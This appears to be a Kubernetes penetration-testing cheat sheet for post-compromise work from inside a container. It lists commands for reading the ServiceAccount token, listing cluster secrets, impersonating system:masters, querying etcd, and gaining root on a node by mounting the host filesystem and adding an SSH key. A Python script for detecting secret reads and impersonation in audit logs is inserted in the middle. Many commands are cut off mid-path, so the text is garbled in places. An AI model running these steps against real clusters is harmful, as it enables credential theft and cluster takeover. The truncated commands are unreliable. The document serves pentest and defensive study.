Compromised Container

Access to Container

NCC Attack Chain / Pentest process

In addition to this page, review: Deep Dive into Real-World Kubernetes Threats

Install custom tools (and prove Internet access)
  • curl -sLO
  • chmod +x kubectl
  • mv kubectl /bin
Obtain the default ServiceAccount token
  • ls /var/run/secrets/
    ca.pem namespace token
  • TOKEN=$(cat /var/run/secrets/
  • CACERT=/var/run/secrets/
  • NAMESPACE=$(cat /var/run/secrets/
Find API server IP and interact with curl
  • env | grep KUBE
  • K8S=https://$K8S_HOST:$K8S_PORT/api/v1/namespaces/
  • curl -H "Authorization: Bearer $TOKEN" --cacert $CACERT $K8S/healthz
Interact with kubectl
  • kubectl --token=<TOKEN> get nodes --all-namespaces
Obtain all secrets
  • Obtain Service Account Token
    • $ read TOKEN < <(kubectl -n default describe secrets $(kubectl -n default get secrets | awk '/SANAME/ {print $1}') | awk '/token:/ {print $2}')
  • Obtain master IP
    • $ kubectl cluster-info
      Kubernetes master is running at MASTER-IP:8443
  • Check that TOKEN can list secrets in default namespace
    • $ curl -k -v -H "Authorization: Bearer <jwt_token>" -H "Content-Type: application/json" https://<master_ip>:6443/api/v1/namespaces/default/secrets | jq -r '.items[].data'
Impersonate privileged account
  • kubectl get secrets --as=null --as-group=system:masters
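Both actions above (a service account listing secrets, and impersonating system:masters) leave a record in the API server audit log. The following Python script is an added defensive example, not part of this cheat sheet: it scans audit.k8s.io/v1 JSON-lines events and flags those two patterns plus denied secret reads. The log records are constructed samples and the finding labels are my own.

```python
import json

# Constructed sample of Kubernetes audit events (audit.k8s.io/v1, JSON lines).
# These records are made up for the example, not captured from a real cluster.
SA = "system:serviceaccount:default:default"
SAMPLE_AUDIT_LOG = "\n".join(json.dumps(e) for e in [
    {"stage": "ResponseComplete", "verb": "list",
     "requestURI": "/api/v1/namespaces/default/secrets", "user": {"username": SA},
     "objectRef": {"resource": "secrets", "namespace": "default"},
     "responseStatus": {"code": 200}},
    # RequestReceived and ResponseComplete are two stages of one request.
    {"stage": "RequestReceived", "verb": "list", "requestURI": "/api/v1/secrets",
     "user": {"username": "alice"},
     "impersonatedUser": {"username": "null", "groups": ["system:masters"]},
     "objectRef": {"resource": "secrets"}},
    {"stage": "ResponseComplete", "verb": "list", "requestURI": "/api/v1/secrets",
     "user": {"username": "alice"},
     "impersonatedUser": {"username": "null", "groups": ["system:masters"]},
     "objectRef": {"resource": "secrets"}, "responseStatus": {"code": 200}},
    {"stage": "ResponseComplete", "verb": "list", "requestURI": "/api/v1/secrets",
     "user": {"username": "system:anonymous"},
     "objectRef": {"resource": "secrets"}, "responseStatus": {"code": 403}},
])

def audit_findings(log_text):
    """Return (username, finding) pairs for suspicious audit events."""
    findings = []
    for line in filter(None, log_text.splitlines()):
        ev = json.loads(line)
        # Examine only ResponseComplete so each request is reported once;
        # RequestReceived repeats the same fields and would duplicate hits.
        if ev.get("stage") != "ResponseComplete":
            continue
        user = ev.get("user", {}).get("username", "")
        groups = (ev.get("impersonatedUser") or {}).get("groups", [])
        resource = (ev.get("objectRef") or {}).get("resource", "")
        code = (ev.get("responseStatus") or {}).get("code", 0)
        # Impersonating system:masters yields cluster-admin regardless of RBAC.
        if "system:masters" in groups:
            findings.append((user, "impersonated system:masters"))
        # A pod's service account rarely has a legitimate reason to read Secrets.
        if (user.startswith("system:serviceaccount:") and resource == "secrets"
                and ev.get("verb") in ("get", "list", "watch")):
            findings.append((user, "service account read secrets"))
        # A denied Secret read suggests probing with an under-privileged identity.
        if resource == "secrets" and code == 403:
            findings.append((user, "denied secrets access"))
    return findings
```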


Direct Dashboard Access
  • curl -s http://kubernetes-dashboard.kube-system
Direct APIs Access
  • kubectl get --raw=/api | jq .serverAddressByClientCIDRs[0].serverAddress -r
  • curl -s
Access the Kubelet API (kubelet-exploit)
  • See Kubelet Exploit
Port Scan
  • See Network page
Access Other Services Inside the Cluster Directly
  • redis-cli -h redis-master.default
Direct ETCD Access (and obtain root on underlying node)
  1. Obtain Kubelet or higher SA Token
  2. Schedule a Pod & mount the host filesystem
  3. Add SSH Key
  4. SSH Into Node
$ curl -s http://<kubernetes-IP>:2379/v2/keys/?recursive=true
Direct ETCD Access (review the content)
  1. Obtain a copy of etcdctl
  2. Query the API
  3. Review/dump the content
$ curl -sLO
# Query the API - v2 (K8s <= 1.5)
#    And explore the config
#    /registry/secrets/default may contain the default service token
$ etcdctl --endpoint=http://[etcd_server_ip]:2379 ls

# Query the API - v3
#   Dump an instance of the etcd database to a file on disk
#   Read the file with:
$ export ETCDCTL_API=3
$ etcdctl snapshot